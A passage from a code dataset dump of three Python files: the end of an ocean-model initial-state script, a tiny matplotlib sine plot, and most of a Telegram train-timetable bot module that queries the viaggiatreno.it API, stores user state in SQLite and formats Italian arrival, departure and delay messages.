2.0\n\n # Normalize T&S:\n temperature[:] += Tmin - np.min(temperature[:])\n salinity[:] += Smin - np.min(salinity[:])\n print(\n 'Temperature ranges from ', np.min(\n temperature[:]), ' to ', np.max(\n temperature[:]))\n print(\n 'Salinity ranges from ', np.min(\n salinity[:]), ' to ', np.max(\n salinity[:]))\n# }}}\n\ndef velocity_init(ds):\n # {{{\n normalVelocity = ds.createVariable(\n 'normalVelocity', np.float64, ('Time', 'nEdges', 'nVertLevels',))\n normalVelocity[:] = 0.0\n# }}}\n\ndef coriolis_init(ds):\n # {{{\n fEdge = ds.createVariable('fEdge', np.float64, ('nEdges',))\n fEdge[:] = 0.0\n fVertex = ds.createVariable('fVertex', np.float64, ('nVertices',))\n fVertex[:] = 0.0\n fCell = ds.createVariable('fCell', np.float64, ('nCells',))\n fCell[:] = 0.0\n# }}}\n\ndef others_init(ds):\n # {{{\n surfaceStress = ds.createVariable(\n 'surfaceStress', np.float64, ('Time', 'nEdges',))\n surfaceStress[:] = 0.0\n atmosphericPressure = ds.createVariable(\n 'atmosphericPressure', np.float64, ('Time', 'nCells',))\n atmosphericPressure[:] = 0.0\n boundaryLayerDepth = ds.createVariable(\n 'boundaryLayerDepth', np.float64, ('Time', 'nCells',))\n boundaryLayerDepth[:] = 0.0\n# }}}\n\nif __name__ == '__main__':\n # If called as a primary module, run main\n main()\n\n# vim: foldmethod=marker ai ts=4 sts=4 et sw=4 ft=python\n","sub_path":"testing_and_setup/compass/ocean/Redi_verification/SouthernOceanSlice40/all/add_initial_state.py","file_name":"add_initial_state.py","file_ext":"py","file_size_in_byte":6837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"65894798","text":"#!/usr/bin/env python3\n# coding=utf-8\n# date 2019-02-18 18:05:45\n# https://github.com/calllivecn\n\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\nx = np.arange(0, 20, 0.1)\n\ny = np.sin(x)\n\nfig, ax = plt.subplots()\n\nax.plot(x, y)\n\n#plt.figure(\"sin函数图像\")\n\nplt.show()\n","sub_path":"matplotlib__/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"615340238","text":"import urllib.request\nimport json\nimport sqlite3\nimport time\nfrom datetime import datetime\nimport datetime\nfrom urllib import *\nimport os\n\nimport random\nimport string\n\nimport logging\nlogger = logging.getLogger(\"bot\")\nlogging.getLogger(\"requests\").setLevel(logging.WARNING)\n\nformat = \"%(asctime)s [%(levelname)s]: %(message)s\"\nlevel = logging.INFO\nlogging.basicConfig(format=format, level=level)\n\nfrom CONFIG import PLOTLY_USERNAME, PLOTLY_API_KEY\n\nimport plotly\nplotly.tools.set_credentials_file(username=PLOTLY_USERNAME, api_key=PLOTLY_API_KEY)\n\nimport plotly.plotly as py\nimport plotly.graph_objs as go\n\nconn = sqlite3.connect('OrarioTreni.db')\nc = conn.cursor()\n\nclass db:\n \"\"\"Gestisci database\"\"\"\n\n def creaTutto():\n \"\"\"Crea la la connessione e la table\"\"\"\n conn = sqlite3.connect('OrarioTreni.db')\n c = conn.cursor()\n try:\n c.execute('''CREATE TABLE stato(userid INTEGER, stato STRING, completato INTEGER)''')\n except:\n pass\n\n try:\n c.execute('''CREATE TABLE bannati(userid INTEGER)''')\n except:\n pass\n\n try:\n c.execute('''CREATE TABLE itinerario(userid INTEGER, stazione1 STRING, stazione2 STRING, orario STRING)''')\n except:\n pass\n\n try:\n c.execute('''CREATE TABLE tracciamento(request_id INTEGER, userid INTEGER, id_treno TEXT, solo_oggi BOOLEAN, stazione_ultimo_rilevamento TEXT, random_string TEXT)''')\n except:\n pass\n\n conn.commit()\n\n def updateState(userid, new_state, completato):\n try:\n c.execute('''DELETE FROM stato WHERE userid=?''',(userid,))\n c.execute('''INSERT INTO stato VALUES(?,?,?)''',(userid, new_state, completato))\n conn.commit()\n logger.info(\"Utente {} nuovo stato {}\".format(userid, new_state))\n return True, None #return \n except Exception as e:\n return False, e\n\n def getState(userid):\n try:\n c.execute('''SELECT stato, completato FROM stato WHERE userid=?''',(userid,))\n rows = c.fetchall()\n for res in rows:\n logger.debug(\"Stato dell'utente {}: {} {}\".format(userid, res[0], res[1]))\n return res[0], res[1], True, None #return \n conn.commit()\n except Exception as e:\n return None, None, False, e\n\n def resetItinerario(userid):\n c.execute('''DELETE FROM itinerario WHERE userid=?''',(userid,))\n conn.commit()\n\n def tracciaTreno(user_id, id_treno, solo_oggi):\n data, success, error = orarioTreni.cercaTreno(id_treno)\n\n stazione_ultimo_rilevamento = data['stazioneUltimoRilevamento']\n if stazione_ultimo_rilevamento == \"--\":\n stazione_ultimo_rilevamento = data['origine']\n\n if stazione_ultimo_rilevamento == data['destinazione']:\n logger.debug(\"Utente {} ha provato a tracciare il treno {} ma è già arrivato a destinazione\".format(user_id, id_treno))\n return \"Il treno è già arrivato a destinazione, traccialo domani!\"\n\n random_string = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(10))\n\n c.execute('SELECT * FROM tracciamento WHERE userid=? 
AND id_treno=?', (user_id, id_treno,))\n if c.fetchall():\n logger.debug(\"Utente {} ha provato a tracciare il treno {} ma lo stava già tracciando\".format(user_id, id_treno))\n return \"Stai già tracciando questo treno!\"\n\n c.execute('''SELECT request_id FROM tracciamento ORDER BY request_id DESC LIMIT 1''')\n rows = c.fetchall()\n if not rows:\n request_id = 0\n for res in rows:\n request_id = res[0] + 1\n\n c.execute('''INSERT INTO tracciamento VALUES(?, ?, ?, ?, ?, ?)''', (request_id, user_id, id_treno, solo_oggi, stazione_ultimo_rilevamento, random_string))\n conn.commit()\n\n logger.info(\"Utente {} ha messo a tracciare il treno {}, request id {}\".format(user_id, id_treno, request_id))\n return request_id\n\nclass orarioTreni:\n \"\"\"Cerca treni, arrivi, partenze, itinerari, statistiche\"\"\"\n def tipo(stringa):\n data, success, error = orarioTreni.cercaTreno(stringa)\n if success == True:\n return \"treno\"\n\n esiste, data = orarioTreni.stazione.check(stringa)\n if esiste == True:\n return \"stazione\"\n\n if stringa.find('-') > 0: #Formato itinerario: STAZIONEA - STAZIONEB (orario)\n return \"itinerario\"\n\n return \"not found\"\n\n def cercaTreno(id_treno):\n content = \"http://www.viaggiatreno.it/viaggiatrenonew/resteasy/viaggiatreno/cercaNumeroTrenoTrenoAutocomplete/\"+id_treno\n response = urllib.request.urlopen(content)\n id_stazione = (str(response.read()).split(\"-\")[-1][:-3])\n try:\n info = \"http://www.viaggiatreno.it/viaggiatrenonew/resteasy/viaggiatreno/andamentoTreno/\"+id_stazione+\"/\"+id_treno\n response = urllib.request.urlopen(info)\n except: #errore urllib (non trovato)\n logging.debug(\"Treno {} non trovato\".format(id_treno))\n return None, False, 404 #data, success, error\n content = response.read()\n data = json.loads(content.decode(\"utf8\"))\n logging.info(\"Cercato il treno {}\".format(id_treno))\n return data, True, None\n\n def cercaItinerario(stazione1, stazione2, orario):\n if orario != None:\n tempogrezzo = orario\n try:\n tempogrezzo = tempogrezzo + datetime.datetime.now().strftime(' %Y-%m-%d')\n tempo = datetime.datetime.strptime(tempogrezzo, '%H:%M %Y-%m-%d')\n tempo = tempo.strftime('%Y-%m-%dT%H:%M:%S')\n except:\n return None, False, 100 #errore\n elif orario == None:\n tempo = datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%S')\n\n try:\n content = \"http://www.viaggiatreno.it/viaggiatrenonew/resteasy/viaggiatreno/cercaStazione/\"+stazione1.replace(\" \",\"%20\") #TODO\n response = urllib.request.urlopen(content)\n except: #errore\n return None, False, 405\n content = response.read()\n if content == b'[]':\n return None, False, 405\n data = json.loads(content.decode(\"utf8\"))\n id_stazione1 = (str(data[0]['id'])).split(\"S\")[-1][:9].split(\"N\")[-1][:9]\n\n try:\n content = \"http://www.viaggiatreno.it/viaggiatrenonew/resteasy/viaggiatreno/cercaStazione/\"+stazione2.replace(\" \",\"%20\") #TODO\n response = urllib.request.urlopen(content)\n except:\n return None, False, 406\n content = response.read()\n if content == b'[]':\n return None, False, 406\n data = json.loads(content.decode(\"utf8\"))\n id_stazione2 = (str(data[0]['id'])).split(\"S\")[-1][:9].split(\"N\")[-1][:9]\n\n content = \"http://www.viaggiatreno.it/viaggiatrenonew/resteasy/viaggiatreno/soluzioniViaggioNew/\"+id_stazione1+\"/\"+id_stazione2+\"/\"+tempo\n response = urllib.request.urlopen(content)\n content = response.read()\n data = json.loads(content.decode(\"utf8\"))\n logging.info(\"Itinerario cercato da {} a {} orario {}\".format(stazione1, stazione2, orario))\n 
return data, True, None\n\n def cercaStatistiche():\n content = \"http://www.viaggiatreno.it/viaggiatrenonew/resteasy/viaggiatreno/statistiche/random\"\n response = urllib.request.urlopen(content)\n content = response.read()\n data = json.loads(content.decode(\"utf8\"))\n logging.info(\"Statistiche cercate\")\n return data, True, None\n\n class stazione:\n def check(stazione):\n stazione = urllib.parse.quote(stazione)\n try:\n content = \"http://www.viaggiatreno.it/viaggiatrenonew/resteasy/viaggiatreno/cercaStazione/\"+stazione.replace(\" \",\"%20\") #soluzione temporanea TODO\n response = urllib.request.urlopen(content)\n except Exception as e:\n logging.info(\"{} non è una stazione\".format(stazione))\n return False, None\n content = response.read()\n if content == b'[]':\n logging.info(\"{} non è una stazione\".format(stazione))\n return False, None\n\n data = json.loads(content.decode(\"utf8\"))\n logging.info(\"{} è una stazione\".format(stazione))\n return True, data\n\n def informazioni(stazione):\n stazione = urllib.parse.quote(stazione)\n try:\n content = \"http://www.viaggiatreno.it/viaggiatrenonew/resteasy/viaggiatreno/cercaStazione/\"+stazione\n response = urllib.request.urlopen(content)\n except:\n return None, False, 404\n content = response.read()\n if content == b'[]':\n return None, False, 404\n data = json.loads(content.decode(\"utf8\"))\n id_stazione = (str(data[0]['id']))\n content = \"http://www.viaggiatreno.it/viaggiatrenonew/resteasy/viaggiatreno/regione/\"+id_stazione\n response = urllib.request.urlopen(content)\n id_regione = response.read()\n content = \"http://www.viaggiatreno.it/viaggiatrenonew/resteasy/viaggiatreno/dettaglioStazione/\"+id_stazione+\"/\"+str(id_regione.decode(\"utf-8\"))\n response = urllib.request.urlopen(content)\n content = response.read()\n data = json.loads(content.decode(\"utf8\"))\n logging.info(\"{} informazioni ottenute\".format(stazione))\n return data\n\n\n def arrivi(stazione):\n stazione = urllib.parse.quote(stazione)\n try:\n content = \"http://www.viaggiatreno.it/viaggiatrenonew/resteasy/viaggiatreno/cercaStazione/\"+stazione\n response = urllib.request.urlopen(content)\n except:\n return None, False, 404\n content = response.read()\n if content == b'[]':\n return None, False, 404\n data = json.loads(content.decode(\"utf8\"))\n id_stazione = (str(data[0]['id']))\n datatempo = datetime.datetime.now().strftime('%a %b %d %Y %H:%M:%S GMT+0100')\n datatempo = datatempo.replace(\" \",\"%20\")\n content = \"http://www.viaggiatreno.it/viaggiatrenonew/resteasy/viaggiatreno/arrivi/\"+id_stazione+\"/\"+datatempo\n response = urllib.request.urlopen(content)\n content = response.read()\n data = json.loads(content.decode(\"utf8\"))\n logging.info(\"{} arrivi ottenuti\".format(stazione))\n return data, True, None\n\n def partenze(stazione):\n stazione = urllib.parse.quote(stazione)\n try:\n content = \"http://www.viaggiatreno.it/viaggiatrenonew/resteasy/viaggiatreno/cercaStazione/\"+stazione\n response = urllib.request.urlopen(content)\n except:\n return None, False, 404\n content = response.read()\n if content == b'[]':\n return None, False, 404\n data = json.loads(content.decode(\"utf8\"))\n id_stazione = (str(data[0]['id']))\n datatempo = datetime.datetime.now().strftime('%a %b %d %Y %H:%M:%S GMT+0100')\n datatempo = datatempo.replace(\" \",\"%20\")\n content = \"http://www.viaggiatreno.it/viaggiatrenonew/resteasy/viaggiatreno/partenze/\"+id_stazione+\"/\"+datatempo\n response = urllib.request.urlopen(content)\n content = response.read()\n 
data = json.loads(content.decode(\"utf8\"))\n logging.info(\"{} partenze ottenute\".format(stazione))\n return data, True, None\n\nclass Messaggi:\n def erroreDB(message, error):\n message.reply(\"*Errore nel database*\"\n \"\\n_Ci scusiamo per il disagio._\"\n \"\\nInoltra questo messaggio *tecnico* a @MarcoBuster *[DEV]*:\"\n \"`{}`\".format(error))\n logging.error(\"Errore database: {}\".format(error))\n def treno1(data):\n orarioPartenza = datetime.datetime.fromtimestamp(data['orarioPartenza'] / 1000).strftime('%H:%M')\n orarioArrivo = datetime.datetime.fromtimestamp(data['orarioArrivo'] / 1000).strftime('%H:%M')\n try:\n oraUltimoRilevamento = datetime.datetime.fromtimestamp(data['oraUltimoRilevamento'] / 1000).strftime('%H:%M')\n except TypeError:\n oraUltimoRilevamento = \"Il treno non è ancora partito\"\n n_fermate = 0\n for dict in data['fermate']:\n n_fermate = n_fermate+1\n\n testo = (\"🚅Treno {0} {1}\"\n \"\\n🚉Stazione di partenza: {2} ({3})\"\n \"\\n🚉Stazione di arrivo: {4} ({5})\"\n \"\\n🕒Ritardo: {6}m\"\n \"\\n🚧Stazione ultimo rilevamento: {7} ({8})\"\n \"\\nℹ️Numero di fermate: {9}\"\n .format(data['categoria'], str(data['numeroTreno']), data['origine'], orarioPartenza,\n data['destinazione'], orarioArrivo, str(data['ritardo']), data['stazioneUltimoRilevamento'],\n oraUltimoRilevamento, str(n_fermate)))\n logging.info(\"Formattato treno {}\".format(data['numeroTreno']))\n return testo\n\n def arriviStazione(data, nomestazione):\n messaggio_iniziale = \"Arrivi della stazione di \"+nomestazione+\":\\n\"\n messaggio = \"\"\n for k in range(0,9):\n try:\n data[k]['numeroTreno']\n except (IndexError, TypeError):\n break\n sOrarioArrivoP = datetime.datetime.fromtimestamp(data[k]['orarioArrivo'] / 1000).strftime('%H:%M')\n binario = data[k]['binarioProgrammatoArrivoDescrizione']\n if data[k]['inStazione'] == False:\n inStazione = \"No\"\n elif data[k]['inStazione'] == True:\n inStazione = \"Sì\"\n messaggio += (\"🚅Treno {} {}\"\n \"\\n🚉Proveniente da: {}\"\n \"\\n🚧In stazione: {}\"\n \"\\n🕒Ritardo: {}m\"\n \"\\n🕰Arrivo previsto: {}\"\n \"\\n🛤Binario: {}\\n\\n\"\n .format(data[k]['categoria'], data[k]['numeroTreno'], data[k]['origine'], inStazione, data[k]['ritardo'], sOrarioArrivoP, str(binario)))\n if messaggio == \"\":\n messaggio = \"\\nNon c'è nessun treno in arrivo in questa stazione\"\n testo = messaggio_iniziale + messaggio\n logging.info(\"Formattati arrivi stazione {}\".format(nomestazione))\n return testo\n\n def partenzeStazione(data, nomestazione):\n messaggio_iniziale = \"Partenze della stazione di \"+nomestazione+\":\\n\"\n messaggio = \"\"\n for k in range(0,9):\n try:\n data[k]['numeroTreno']\n except (IndexError, TypeError):\n break\n sOrarioPartenzaP = datetime.datetime.fromtimestamp(data[k]['orarioPartenza'] / 1000).strftime('%H:%M')\n binario = data[k]['binarioProgrammatoPartenzaDescrizione']\n if data[k]['inStazione'] == False:\n inStazione = \"No\"\n elif data[k]['inStazione'] == True:\n inStazione = \"Sì\"\n messaggio += (\"🚅Treno {} {}\"\n \"\\n🚉Diretto a: {}\"\n \"\\n🚧In stazione: {}\"\n \"\\n🕒Ritardo: {}m\"\n \"\\n🕰Partenza prevista: {}\"\n \"\\n🛤Binario: {}\\n\\n\"\n .format(data[k]['categoria'], data[k]['numeroTreno'], data[k]['destinazione'], inStazione, data[k]['ritardo'], sOrarioPartenzaP, str(binario)))\n if messaggio == \"\":\n messaggio = \"\\nNon c'è nessun treno in partenza in questa stazione\"\n testo = messaggio_iniziale + messaggio\n logging.info(\"Formattate partenze stazione {}\".format(nomestazione))\n return testo\n\n def 
itinerario(data):\n messaggio = \"Ho trovato questo itinerario da {0} a {1}\".format(data['origine'], data['destinazione'])\n inline_keyboard = '['\n soluzioni = \"\"\n n_soluzioni = 0\n fff = \"\"\n\n for dictionary in data['soluzioni']:\n n_soluzioni += 1\n soluzioni = \"\\n\\n➖➖➖Soluzione {n}\".format(n=n_soluzioni)\n fff += \"\\n\\n\\nSoluzione #{n}\".format(n=n_soluzioni)\n\n n_cambi = -1\n\n for dict in dictionary['vehicles']:\n n_cambi = n_cambi + 1\n fff += \"---Cambio #{n}\".format(n=n_cambi)\n orarioPartenza = datetime.datetime.strptime(dict['orarioPartenza'], '%Y-%m-%dT%H:%M:%S').strftime('%H:%M')\n orarioArrivo = datetime.datetime.strptime(dict['orarioArrivo'], '%Y-%m-%dT%H:%M:%S').strftime('%H:%M')\n\n if n_cambi > 0:\n a_capo = \"\\n🚧Cambio🚧\"\n else:\n a_capo = \"\"\n\n if n_cambi == 0:\n soluzione = soluzioni\n else:\n soluzione = \"\"\n\n messaggio = messaggio + soluzione + a_capo + (\n \"\\n🚅Treno {0} {1}\"\n \"\\n🚉Parte da {2} alle ore {3}\"\n \"\\n🚉Arriva a {4} alle ore {5}\".format(dict['categoriaDescrizione'], str(dict['numeroTreno']), dict['origine'], orarioPartenza, dict['destinazione'], orarioArrivo)\n )\n inline_keyboard = inline_keyboard + '[{\"text\":\"🔍Altre informazioni sul treno '+dict['categoriaDescrizione']+\" \"+str(dict['numeroTreno'])+'\", \"callback_data\": \"agg@'+str(dict['numeroTreno'])+'\"}],'\n\n if n_soluzioni > 4:\n break\n\n inline_keyboard = inline_keyboard + '[{\"text\":\"🔙Torna indietro\", \"callback_data\":\"home\"}]]'\n logging.info(\"Formattato itinerario da {} a {}\".format(data['origine'], data['destinazione']))\n print(messaggio)\n return messaggio, inline_keyboard\n\n def listaStazioni(data):\n numero_dict = 0\n inline_keyboard = '['\n for dict in data:\n numero_dict = numero_dict + 1\n stazione = dict['nomeLungo']\n callback_data = \"staz$\"+dict['nomeLungo']\n inline_keyboard = inline_keyboard + '[{\"text\":\"'+stazione+'\",\"callback_data\":\"'+callback_data+'\"}],'\n\n if numero_dict == 1:\n return 1, None\n\n messaggio = \"Ho trovato {} stazioni con quel nome:\".format(numero_dict)\n inline_keyboard = inline_keyboard + '[{\"text\":\"🔙Torna indietro\",\"callback_data\":\"home\"}]]'\n logging.info(\"Formattata lista stazioni\")\n return messaggio, inline_keyboard\n\n def fermata(data, numeroFermata):\n id_treno = data['numeroTreno']\n cat_treno = data['categoria']\n data = data['fermate'][int(numeroFermata)]\n\n Arrivo = None\n Partenza = None\n\n tipoFermata = data['tipoFermata'].replace(\"P\", \"stazione di partenza\").replace(\"A\", \"stazione di destinazione\").replace(\"F\", \"fermata intermedia\")\n\n if data['tipoFermata'] == \"P\" and data['actualFermataType'] == 0: #Stazione di partenza del treno, non è ancora partito.\n orarioPartenzaTeorica = datetime.datetime.fromtimestamp(data['partenza_teorica'] / 1000).strftime('%H:%M')\n Partenza = \"ℹ️Il treno è previsto in partenza alle ore {0} al binario {1}\".format(orarioPartenzaTeorica, data['binarioProgrammatoPartenzaDescrizione'].strip())\n Arrivo = \"\"\n\n if data['tipoFermata'] == \"P\" and data['actualFermataType'] != 0:\n orarioPartenzaTeorica = datetime.datetime.fromtimestamp(data['partenza_teorica'] / 1000).strftime('%H:%M')\n orarioPartenzaEffettiva = datetime.datetime.fromtimestamp(data['partenzaReale'] / 1000).strftime('%H:%M')\n ritardoPartenza = data['ritardoPartenza']\n\n if ritardoPartenza == 1:\n ritardoPartenza = \"con un ritardo di 1 minuto\"\n emoji = \"👍\"\n elif ritardoPartenza == -1:\n ritardoPartenza = \"in anticipo di 1 minuto\"\n emoji = \"👍\"\n elif 
ritardoPartenza > 1:\n ritardoPartenza = \"con un ritardo di {} minuti\".format(str(ritardoPartenza))\n emoji = \"❗️\"\n elif ritardoPartenza < 1:\n ritardoPartenza = \"in anticipo di {} minuti\".format(str(abs(ritardoPartenza)))\n emoji = \"⁉️\"\n if data['ritardoPartenza'] == 0:\n ritardoPartenza = \"in perfetto orario\"\n emoji = \"👌\"\n\n if data['binarioEffettivoPartenzaDescrizione'] == None:\n binario = data['binarioProgrammatoPartenzaDescrizione'].strip()\n else:\n binario = data['binarioEffettivoPartenzaDescrizione'].strip()\n Partenza = \"{3}Il treno è partito dal binario {0} alle ore {1} {2}\".format(binario, orarioPartenzaEffettiva, ritardoPartenza, emoji)\n Arrivo = \"\"\n\n if data['tipoFermata'] == \"F\" and data['actualFermataType'] != 0: #il treno è arrivato in stazione e forse è anche partito. fermata INTERMEDIA\n orarioArrivoProgrammato = datetime.datetime.fromtimestamp(data['arrivo_teorico'] / 1000).strftime('%H:%M')\n orarioPartenzaProgrammato = datetime.datetime.fromtimestamp(data['partenza_teorica'] / 1000).strftime('%H:%M')\n if data['ritardoArrivo'] == 0:\n orarioArrivoEffettivo = orarioArrivoProgrammato\n else:\n orarioArrivoEffettivo = datetime.datetime.fromtimestamp(data['arrivoReale'] / 1000).strftime('%H:%M')\n if data['ritardoPartenza'] == 0:\n orarioPartenzaEffettiva = orarioPartenzaProgrammato\n else:\n orarioPartenzaEffettiva = datetime.datetime.fromtimestamp(data['partenzaReale'] / 1000).strftime('%H:%M')\n ritardoArrivo = data['ritardoArrivo']\n ritardoPartenza = data['ritardoPartenza']\n if data['partenzaReale'] == None: #ergo il treno non è ancora partito ed è fermo in stazione\n if ritardoArrivo == 1:\n ritardoArrivo = \"con un ritardo di 1 minuto\"\n emoji = \"👍\"\n elif ritardoArrivo == -1:\n ritardoArrivo = \"in anticipo di 1 minuto\"\n emoji = \"👍\"\n elif ritardoArrivo > 1:\n ritardoArrivo = \"con un ritardo di {} minuti\".format(str(ritardoArrivo))\n emoji = \"❗️\"\n elif ritardoArrivo < 1:\n ritardoArrivo = \"in anticipo di {} minuti\".format(str(abs(ritardoArrivo)))\n emoji = \"⁉️\"\n\n if data['ritardoArrivo'] == 0:\n ritardoArrivo = \"in perfetto orario\"\n emoji = \"👌\"\n\n if data['binarioEffettivoArrivoDescrizione'] == None:\n binario = data['binarioProgrammatoArrivoDescrizione'].strip()\n else:\n binario = data['binarioEffettivoArrivoDescrizione'].strip()\n Arrivo = \"{3}Il treno è arrivato al binario {0} alle ore {1} {2}\".format(binario, orarioArrivoEffettivo, ritardoArrivo, emoji)\n\n if data['binarioEffettivoPartenzaDescrizione'] == None:\n binario = data['binarioProgrammatoPartenzaDescrizione'].strip()\n else:\n binario = data['binarioEffettivoPartenzaDescrizione'].strip()\n Partenza = \"▶️Il treno partirà dal binario {0} alle ore {1}\".format(binario, orarioPartenzaProgrammato)\n else:\n if ritardoArrivo == 1:\n ritardoArrivo = \"con un ritardo di 1 minuto\"\n emoji = \"👍\"\n elif ritardoArrivo == -1:\n ritardoArrivo = \"in anticipo di 1 minuto\"\n emoji = \"👍\"\n elif ritardoArrivo > 1:\n ritardoArrivo = \"con un ritardo di {} minuti\".format(str(ritardoArrivo))\n emoji = \"❗️\"\n elif ritardoArrivo < 1:\n ritardoArrivo = \"in anticipo di {} minuti\".format(str(abs(ritardoArrivo)))\n emoji = \"⁉️\"\n if data['ritardoArrivo'] == 0:\n ritardoArrivo = \"in perfetto orario\"\n emoji = \"👌\"\n\n if data['binarioEffettivoArrivoDescrizione'] == None:\n binario = data['binarioProgrammatoArrivoDescrizione'].strip()\n else:\n binario = data['binarioEffettivoArrivoDescrizione'].strip()\n Arrivo = \"{3}Il treno è arrivato al binario {0} alle 
ore {1} {2}\".format(binario, orarioArrivoEffettivo, ritardoArrivo, emoji)\n if ritardoPartenza == 1:\n ritardoPartenza = \"con un ritardo di 1 minuto\"\n emoji = \"👍\"\n elif ritardoPartenza == -1:\n ritardoPartenza = \"in anticipo di 1 minuto\"\n emoji = \"👍\"\n elif ritardoPartenza > 1:\n ritardoPartenza = \"con un ritardo di {} minuti\".format(str(ritardoPartenza))\n emoji = \"❗️\"\n elif ritardoPartenza < 1:\n ritardoPartenza = \"in anticipo di {} minuti\".format(str(abs(ritardoPartenza)))\n emoji = \"⁉️\"\n if data['ritardoPartenza'] == 0:\n ritardoPartenza = \"in perfetto orario\"\n emoji = \"👌\"\n\n if data['binarioEffettivoPartenzaDescrizione'] == None:\n binario = data['binarioProgrammatoPartenzaDescrizione'].strip()\n else:\n binario = data['binarioEffettivoPartenzaDescrizione'].strip()\n Partenza = \"{3}Il treno è partito dal binario {0} alle ore {1} {2}\".format(binario, orarioPartenzaEffettiva, ritardoPartenza, emoji)\n\n if data['tipoFermata'] == \"F\" and data['actualFermataType'] == 0: #Il treno non è ancora arrivato alla stazione INTERMEDIA x\n orarioArrivoTeorica = datetime.datetime.fromtimestamp(data['arrivo_teorico'] / 1000).strftime('%H:%M')\n Arrivo = \"ℹ️Il treno è previsto in arrivo alle ore {0} al binario {1}\".format(orarioArrivoTeorica, data['binarioProgrammatoArrivoDescrizione'])\n orarioPartenzaTeorica = datetime.datetime.fromtimestamp(data['partenza_teorica'] / 1000).strftime('%H:%M')\n Partenza = \"ℹ️Il treno è previsto in partenza alle ore {0} al binario {1}\".format(orarioPartenzaTeorica, data['binarioProgrammatoPartenzaDescrizione'])\n\n\n if data['tipoFermata'] == \"A\" and data['actualFermataType'] != 0: #Il treno è arrivato alla stazione di arrivo finale x\n orarioArrivoTeorica = datetime.datetime.fromtimestamp(data['arrivo_teorico'] / 1000).strftime('%H:%M')\n if data['ritardoArrivo'] == 0:\n orarioArrivoEffettiva = orarioArrivoTeorica\n else:\n orarioArrivoEffettiva = datetime.datetime.fromtimestamp(data['arrivoReale'] / 1000).strftime('%H:%M')\n ritardoArrivo = data['ritardoArrivo']\n if ritardoArrivo == 1:\n ritardoArrivo = \"con un ritardo di 1 minuto\"\n emoji = \"👍\"\n elif ritardoArrivo == -1:\n ritardoArrivo = \"in anticipo di 1 minuto\"\n emoji = \"👍\"\n elif ritardoArrivo > 1:\n ritardoArrivo = \"con un ritardo di {} minuti\".format(str(ritardoArrivo))\n emoji = \"❗️\"\n elif ritardoArrivo < 1:\n ritardoArrivo = \"in anticipo di {} minuti\".format(str(abs(ritardoArrivo)))\n emoji = \"⁉️\"\n\n if data['ritardoArrivo'] == 0:\n ritardoArrivo = \"in perfetto orario\"\n emoji = \"👌\"\n\n if data['binarioEffettivoArrivoDescrizione'] == None and data['binarioProgrammatoArrivoDescrizione'] == None:\n binario = \"?\"\n elif data['binarioEffettivoArrivoDescrizione'] == None:\n binario = data['binarioProgrammatoArrivoDescrizione'].strip()\n else:\n binario = data['binarioEffettivoArrivoDescrizione'].strip()\n Arrivo = \"{3}Il treno è partito dal binario {0} alle ore {1} {2}\".format(data['binarioEffettivoArrivoDescrizione'], orarioArrivoEffettiva, ritardoArrivo, emoji)\n Partenza = \"\"\n\n if data['tipoFermata'] == \"A\" and data['actualFermataType'] == 0:\n orarioArrivoTeorica = datetime.datetime.fromtimestamp(data['arrivo_teorico'] / 1000).strftime('%H:%M')\n Arrivo = \"ℹ️Il treno è previsto in arrivo alle ore {0} al binario {1}\".format(orarioArrivoTeorica, data['binarioProgrammatoArrivoDescrizione'].strip())\n Partenza = \"\"\n\n actualFermataType = data['actualFermataType']\n if actualFermataType == 0 or actualFermataType == 1:\n 
actualFermataType = \"\"\n elif actualFermataType == 2:\n actualFermataType = \"\\n❗️Fermata non prevista\"\n elif actualFermataType == 3:\n actualFermataType = \"\\n‼️Fermata soppressa\"\n\n ritardoArrivo, ritardoPartenza = data['ritardoArrivo'], data['ritardoPartenza']\n\n if Arrivo == None and Partenza == None and data['actualFermataType'] == 0:\n messaggio = (\"Errore sconosciuto\"\n \"\\nUn errore delle ferrovie dello Stato o del bot?\"\n \"\\nNel dubbio, inoltra questo messaggio allo sviluppatore (@MarcoBuster) o esegui il comando /feedback\"\n \"\\nNumero treno: {0}\"\n \"\\nID stazione: {1}\"\n \"\\nInformazioni dell'arrivo: None\"\n \"\\nInformazioni di partenza: None\"\n \"\\nactualFermataType: {2}\"\n \"\\n\\nNon arrabiarti con lo sviluppatore o lasciare recensioni negative, tu non immagini nemmeno quante variabili ci sono in ballo e quanto i dati di Trenitalia siano sballati a volte😢\" #A sad but true story\n \"\\nGuarda il codice su GitHub, se non ci credi: www.github.com/MarcoBuster/OrarioTreniBot.\".format(str(id_treno), str(numeroFermata), str(data['actualFermataType']))\n )\n logging.error(\"Formattazione fermata id treno: {}, numero fermata: {}, actualFermataType: {}\".format(id_treno, numeroFermata, actualFermataType))\n return messaggio\n\n if Arrivo == None and Partenza == None:\n messaggio = (\n \"ℹ️Informazioni del treno {0} {1} rispetto alla fermata {2}\\n\".format(cat_treno, id_treno, data['stazione'])\n +actualFermataType\n )\n logging.info(\"Formattazione fermata {} treno {} \".format(numeroFermata, id_treno))\n return messaggio\n else:\n messaggio = (\n \"ℹ️Informazioni del treno {0} {1} rispetto alla fermata {2}\\n\".format(cat_treno, id_treno, data['stazione'])\n +Arrivo+ (\"\\n\" if Arrivo != \"\" else \"\")\n +Partenza+ (\"\\n\" if Partenza != \"\" else \"\")\n +actualFermataType\n )\n logging.info(\"Formattazione fermata {} treno {} \".format(numeroFermata, id_treno))\n return messaggio\n\n def grafico(data, id_treno):\n fermate = []\n ritardi = []\n\n for dictionary in data['fermate']:\n if dictionary['actualFermataType'] == 0:\n break\n\n fermate = fermate + [dictionary['stazione']]\n ritardi = ritardi + [dictionary['ritardo']]\n\n if len(fermate) < 2 or len(ritardi) < 2:\n return False\n\n line = go.Scatter(\n x = fermate,\n y = ritardi,\n name = 'Ritardo',\n line = dict(\n color = ('rgb(205, 12, 24)'),\n width = 4,\n shape = 'spline')\n )\n\n title = 'Ritardo del treno {id_treno} • @OrarioTreniBot'.format(id_treno=id_treno)\n layout = dict(title = title,\n xaxis = dict(title = 'Fermata'),\n yaxis = dict(title = 'Ritardo (minuti)'),\n )\n\n filename = os.getcwd() + \"/ritardo_treno@{id_treno}.png\".format(id_treno=id_treno)\n fig = dict(data=[line], layout=layout)\n py.image.save_as(fig, 